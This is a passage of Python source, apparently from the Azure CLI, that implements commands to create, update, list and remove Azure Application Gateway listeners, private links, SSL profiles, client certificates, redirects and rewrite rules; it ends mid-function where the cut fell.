def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
ssl_profile_id=None, firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
if cmd.supported_api_version(min_api='2020-06-01'):
new_listener.ssl_profile = SubResource(id=ssl_profile_id) if ssl_profile_id else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, ssl_profile_id=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if cmd.supported_api_version(min_api='2020-06-01'):
if ssl_profile_id is not None:
instance.ssl_profile = SubResource(id=ssl_profile_id)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_indentity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_indentity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
raise CLIError('Frontend IP already reference an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
raise CLIError('Private Link name duplicates')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
raise CLIError('Subnet duplicates')
if subnet.address_prefix == private_link_subnet_prefix:
raise CLIError('Subnet prefix duplicates')
if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
raise CLIError('Subnet prefix duplicates')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
# the left vnet have to delete manually
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
cert.data = client_cert_data
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
instance = cert
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return instance
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
if policy_name is not None:
instance.ssl_policy.policy_name = policy_name
if policy_type is not None:
instance.ssl_policy.policy_type = policy_type
if min_protocol_version is not None:
instance.ssl_policy.min_protocol_version = min_protocol_version
if cipher_suites is not None:
instance.ssl_policy.cipher_suites = cipher_suites
if disabled_ssl_protocols is not None:
instance.ssl_policy.disabled_ssl_protocols = disabled_ssl_protocols
if trusted_client_certificates is not None:
SubResource = cmd.get_models('SubResource')
instance.trusted_client_certificates = [SubResource(id=item) for item in trusted_client_certificates]
if client_auth_configuration is not None:
ApplicationGatewayClientAuthConfiguration = cmd.get_models('ApplicationGatewayClientAuthConfiguration')
instance.client_auth_configuration = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=(client_auth_configuration == 'True')
)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return instance
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
new_rule = ApplicationGatewayRewriteRule(
name=rule_name,
rule_sequence=sequence,
action_set=ApplicationGatewayRewriteRuleActionSet(
request_header_configurations=request_headers,
response_header_configurations=response_headers,
url_configuration=url_configuration
)
)
upsert_to_collection(rule_set, 'rewrite_rules', new_rule, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def update_ag_rewrite_rule(instance, parent, cmd, rule_set_name, rule_name, sequence=None,
request_headers=None, response_headers=None,
modified_path=None, modified_query_string=None, enable_reroute=None):
with cmd.update_context(instance) as c:
c.set_param('rule_sequence', sequence)
c.set_param('action_set.request_header_configurations', request_headers)
c.set_param('action_set.response_header_configurations', response_headers)
ApplicationGatewayUrlConfiguration = cmd.get_models('ApplicationGatewayUrlConfiguration')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
c.set_param('action_set.url_configuration', url_configuration)
return parent
def show_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
def list_ag_rewrite_rules(cmd, resource_group_name, application_gateway_name, rule_set_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, path='rewrite_rule_sets.rewrite_rules', key_path='name')
def delete_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(gateway, rule_set_name, path='rewrite_rule_sets', key_path='name')
rule = find_child_item(rule_set, rule_name, path='rewrite_rules', key_path='name')
rule_set.rewrite_rules.remove(rule)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
variable, no_wait=False, pattern=None, ignore_case=None, negate=None):
ApplicationGatewayRewriteRuleCondition = cmd.get_models(
'ApplicationGatewayRewriteRuleCondition')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule = find_child_item(ag, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
new_condition = ApplicationGatewayRewriteRuleCondition(
variable=variable,
pattern=pattern,
ignore_case=ignore_case,
negate=negate
)
upsert_to_collection(rule, 'conditions', new_condition, 'variable')
if no_wait:
